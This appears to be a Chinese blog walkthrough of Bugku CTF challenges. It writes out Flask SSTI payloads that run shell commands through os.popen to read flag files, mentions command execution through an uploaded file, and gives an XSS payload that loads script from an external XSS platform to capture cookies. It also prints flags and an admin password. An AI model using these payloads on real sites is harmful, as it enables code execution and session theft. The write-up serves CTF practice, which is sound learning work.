首页 > 其他分享 >bugku攻略

bugku攻略

时间:2024-07-30 22:56:01浏览次数:15  
标签:bugku 查看 Simple __.__ flag 源码 攻略 config

目录

第一关(Simple_SSTI_1)

第二关(Simple_SSTI_2)

第三关(Flask_FileUpload)

第四关(留言板)

第五关(滑稽)


第一关(Simple_SSTI_1)

查看源码,需要我们在flask里建立一个SECRET_KEY

直接访问URL+?flag={{ config.SECRET_KEY}}得到flag

输入flag

第二关(Simple_SSTI_2)

查看源码

ls查看目录

?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

先查看"app"目录

?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

发现flag,cat查看

?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

输入flag

第三关(Flask_FileUpload)

查看源码

使用os.system函数执行操作系统命令,拓展名用.jpg

上传

上传成功

查看源码,发现flag

用cat查看flag

得到flag <!-- flag{e13116c6a0d47819c5a246330c444339} -->

输入flag

第四关(留言板)

扫描目录(由于已提交flag,这份是第二份IP的扫描目录)

复制配置代码

上传<sCRiPt sRC=//xs.pe/MJI></sCrIpT>

这里账号为admin 密码为011be4d65feac1a8

也可以输入“<script>alert(document.cookie)</script>”在页面弹出flag

”已有主机上线“,在cookie也有flag

输入flag

第五关(滑稽)

访问查看源码,得到flag(费眼QAQ)

<!--flag{a72c796cb88ed7fc69c8cba81046c531}-->

输入flag

第六关:(持续更新ing) 

标签:bugku,查看,Simple,__.__,flag,源码,攻略,config
From: https://blog.csdn.net/qq_68186313/article/details/140808765

相关文章

  • 小白必看的java完整下载攻略!(在Typora中有图片参考)
    Java下载在浏览器上搜索JDK(2024年最新版是22,本人下载的是21)点击官网下载,会跳到Oracle官网,需要注册账号才可下载根据自己的电脑型号选择下载(本人下载的是64的)正常情况下下载的JDK版本后缀是exeJava安装的后续操作作为一个程序员坚持不懈才能成就大事。完成Java安装后事情还......
  • Bugku:Simple_SSTI_2
    目录1.进入网站查看题目2.开始尝试3.判断引擎模板类型4.构造语句,开始注入5.得到flag1.进入网站查看题目再查看源代码,发现没有什么有用的。根据题目提示SSTI,搜索一下SSTI,了解一下。  SSTI(服务器端模板注入)也是格式化字符串的一个非常好的例子,如今的开发已经形成......
  • 工单管理系统全攻略:找到你的完美匹配
    国内外主流的10款项目工单管理系统对比:PingCode、Worktile、浪潮云工单管理系统、华为企业智能工单系统、金蝶云·苍穹、紫光软件管理系统、Jira、Asana、ServiceNow、Smartsheet。在管理日益复杂的个人项目时,找到一款能够真正符合需求的管理软件,常常是许多人面临的难题。市面......
  • Bugku CTF 合集
    1.Simple_SSTI_11.打开靶场,翻译得知需要输入一个flag作为参数,检查源代码,发现可以设置secretkey作为变量经了解,SSTL是一个模板注入,SECRETKEY:是flask一个重要得配置值需要用以下代码来加密/?flag={{config.SECRETKEY}}(注意大小写),或直接/?flag={{config}}......
  • 大厂linux面试题攻略四之Linux网络服务(二)
     五、Linux网络服务-Apache优化1.请写出工作中常见的Apache优化策略Apache服务器优化是提升网站响应速度和稳定性的重要手段。在工作中,常见的Apache优化策略包括以下几个方面:1.启用压缩技术Gzip压缩:使用Gzip压缩技术可以减少服务器传输的数据量,从而提高网页加载速度。Gzi......
  • Stable Diffusion 提示词攻略
    一、提示词作用提示词所做的工作是缩小模型出图的解空间,即缩小生成内容时在模型数据里的检索范围,而非直接指定作画结果。提示词的效果也受模型的影响,有些模型对自然语言做特化训练,有些模型对单词标签对做特化训练,那么对不同的提示词语言风格的反应就不同。二、提示词内容......
  • 小红书笔记评论采集全攻略:三种高效方法教你批量导出
    摘要:本文将深入探讨如何利用Python高效采集小红书平台上的笔记评论,通过三种实战策略,手把手教你实现批量数据导出。无论是市场分析、竞品监测还是用户反馈收集,这些技巧都将为你解锁新效率。一、引言:小红书数据金矿与采集挑战在社交电商领域,小红书凭借其独特的UGC内容模式,积累......
  • 征服 Docker 镜像访问限制:KubeSphere v3.4.1 成功部署全攻略
    近期,KubeSphere社区的讨论中频繁出现关于Docker官方镜像仓库访问受限的问题。本文旨在为您提供一个详细的指南,展示在Docker官方镜像访问受限的情况下,如何通过KubeKeyv3.1.2一次性成功部署KubeSpherev3.4.1以及Kubernetesv1.28.8集群。这将帮助您克服访问限制,确保......
  • LLM大模型全攻略:一本书精通AI的未来【附赠PDF】
    哈喽大家好!最近有粉丝朋友喊我推荐一些大模型的学习书籍,我给大家推荐这么一本书,基于gbt3、gbt4等transform架构的自然语言处理。这是一本对transform工作原理感兴趣的人必读的书籍。亚马逊的评分是九点七分,内行人在睡不着的时候恨不得把全书都背诵完毕。本书的写作目的是......
  • 探索Memcached的守护神眼:日志记录与分析工具全攻略
    探索Memcached的守护神眼:日志记录与分析工具全攻略Memcached作为一种高性能的分布式内存缓存系统,其日志记录和分析对于维护系统稳定性、优化性能和排查问题至关重要。本文将详细介绍Memcached的日志记录机制以及如何使用各种工具和方法来分析这些日志。1.Memcached日志:系......